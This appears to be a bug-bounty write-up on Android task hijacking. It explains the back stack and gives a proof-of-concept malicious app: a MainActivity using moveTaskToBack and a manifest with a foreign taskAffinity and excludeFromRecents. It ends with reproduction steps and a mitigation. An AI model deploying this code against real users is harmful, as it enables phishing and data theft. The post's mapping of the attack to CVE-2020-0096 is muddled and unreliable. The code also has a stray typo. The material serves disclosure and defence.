Understanding Task Injection Vulnerabilities: A Bug Bounty Perspective

Introduction

Task Hijacking was first introduced by USENIX in 2015. It is also known as Strandhogg by many researchers.

I have submitted this vulnerability to multiple bug bounty programs, and it is marked as High-Low and informational. It is a vulnerability that is currently "not accepted" due to Android updates. According to statistics in the Android market, the use of Android 9 version by users has fallen below 6% (statcounter), but I think it can still be used in pentest reports (Cure53 Pentest Report).

How It Works

When the user taps an app's icon, the task for that app comes to the foreground. If there is no task for the app, a new task is created and the app's main activity is opened as the root activity of the stack. When an activity starts another activity, the new activity is added to the top of the stack and focused. The previous activity remains in the stack, but is stopped.

When the user performs a back operation, the current activity is removed from the top of the stack and destroyed. The previous activity continues, and the previous state of the user interface is restored. Activities in the stack are never reorganized; they are only added to or removed from the stack as they are started and closed by the user with the Back button or gesture.

As the user taps or gestures Back, the stack removes the top activity and displays the previous activity, until the user returns to the Home screen or the activity that was running when the task started. When all activities are removed from the stack, the task no longer exists. Reference: Tasks and the back stack - Android Developer

Task Hijacking

Task Hijacking is a vulnerability that affects applications running on Android devices with Task Control features due to misconfiguration in the AndroidManifest.xml file. This allows attackers/malware to hijack legitimate applications and steal user data, performing a series of attacks such as:

• Listen through the microphone
• Take photos with the camera
• Read and send SMS messages
• Make or record phone conversations
• Phish for login credentials
• Access private photos and files
• Obtain location and GPS information
• Access the contacts list and phone logs

Other important points:

• This could lead to local escalation of privilege with no additional execution privileges needed.
• It doesn’t need the target device to be rooted.
• It doesn’t require any specific permissions.
• The malicious app minimizes the activity and hides itself from the popup in the overview screen.

Code Example

Here’s a snippet of the MainActivity.java source code demonstrating how the malicious app operates:

package com.example.taskinjection;

import android.os.Bundle;f

import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.taskinjection);
        moveTaskToBack(true);
    }

    @Override
    public void onResume(){
        super.onResume();
        setContentView(R.layout.taskinjection);
    }
}

And the corresponding AndroidManifest.xml file:

<?xml version="1.0" encoding="utf-8"?>
  <manifest xmlns:android="http://schemas.android.com/apk/res/android"
      package="com.example.taskinjection"
      android:versionCode="1"
      android:versionName="1.0" >

<application
      android:allowBackup="true"
      android:icon="@mipmap/ic_launcher"
      android:label="@string/app_name"
      android:roundIcon="@mipmap/ic_launcher_round"
      android:supportsRtl="true"
      android:theme="@style/Theme.Taskinjection"
      android:taskAffinity="com.x.x">
      <activity android:name=".MainActivity" android:launchMode="singleTask" android:excludeFromRecents="true">
          <intent-filter>
              <action android:name="android.intent.action.MAIN" />

            <category android:name="android.intent.category.LAUNCHER" />
          </intent-filter>
      </activity>
  </application>

</manifest>

Mitigation

In this vulnerability, there are two types of hijacking state transitions:

• Replace any application with malware.
• Pressed the Back button, application activity dropped, it puts malware activity in the foreground.

Steps:

• Execute X Android App and clear all on your overview screen.
• Execute the malicious app. The "moveTaskToBack" function minimizes the activity and the "excludeFromRecents" attribute hides the application from the popup in the overview screen.
• Even though we execute the X Android App, the activity of the malicious application occurs.

Mitigation:

• It can add android:taskAffinity="" to the <application> tag in the AndroidManifest.xml.
• If the application executes on an older Android OS version/Security patch level, a security notice may occur and/or the application will not execute.

CVE and CVSS Rating

This vulnerability is akin to Strandhogg 1.0 and is defined as Strandhogg 2.0 (CVE-2020-0096) in the Android source, with a severity marked as "Critical." The CVSS base score is 7.8, with an impact subscore of 5.9.

References

• CVE-2020-0096 CVSS v3.1 Calculator
• Android Security Bulletin - May 2020
• Vulmon - CVE-2020-0096 Vulnerability Details
• CVE-2020-0096 - MITRE CVE
• Android task hijacking using moveTaskToBack() and excludeFromRecents